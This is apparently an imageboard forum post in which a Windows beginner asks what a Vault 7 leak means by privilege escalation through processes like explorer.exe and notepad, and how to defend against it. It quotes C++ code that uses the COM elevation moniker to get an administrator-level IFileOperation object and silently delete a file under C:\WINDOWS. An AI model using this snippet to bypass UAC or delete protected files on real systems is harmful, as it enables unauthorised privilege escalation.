Notepad privilege escalation exploit

File: Stan_Smith_7736.png (74KB, 320x240px) Image search: [Google]

74KB, 320x240px

The vault 7 leaks say you can escalate privilege using code "within the context of a process approved for elevation", with explorer.exe and notepad as examples.

Windows noob here. What does that mean, and how do I protect against it? Are they giving corrupted binaries or are they getting notepad to execute their code? Link and code used below:

https://wikileaks.org/ciav7p1/cms/page_3375231.html

HRESULT CoCreateInstanceAsAdmin(HWND hwnd, REFCLSID rclsid, REFIID riid, void **ppv)
{
    BIND_OPTS3 bo;
    WCHAR wszCLSID[50];
    WCHAR wszMon[300];
 
    StringFromGUID2(rclsid, wszCLSID, sizeof(wszCLSID)/sizeof(wszCLSID[0]));
    HRESULT hr = StringCchPrintfW(wszMon, sizeof(wszMon)/sizeof(wszMon[0]), L"Elevation:Administrator!new:%s", wszCLSID);
    if (FAILED(hr))
        return hr;
    memset(&bo, 0, sizeof(bo));
    bo.cbStruct = sizeof(bo);
    bo.hwnd = hwnd;
    bo.dwClassContext = CLSCTX_LOCAL_SERVER;
    return CoGetObject(wszMon, &bo, riid, ppv);
}
 
void ElevatedDelete()
{
    MessageBox(NULL, "DELETING", "TESTING", MB_OK);
 
    // This is only availabe on Vista and higher
    HRESULT hr = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED | COINIT_DISABLE_OLE1DDE);
    IFileOperation *pfo;
    hr = CoCreateInstanceAsAdmin(NULL, CLSID_FileOperation, IID_PPV_ARGS(&pfo));
    pfo->SetOperationFlags(FOF_NO_UI);
    IShellItem *item = NULL;
    hr = SHCreateItemFromParsingName(L"C:\\WINDOWS\\TEST.DLL", NULL, IID_PPV_ARGS(&item));
    pfo->DeleteItem(item, NULL);
    pfo->PerformOperations();
    item->Release();
    pfo->Release();
    CoUninitialize();
}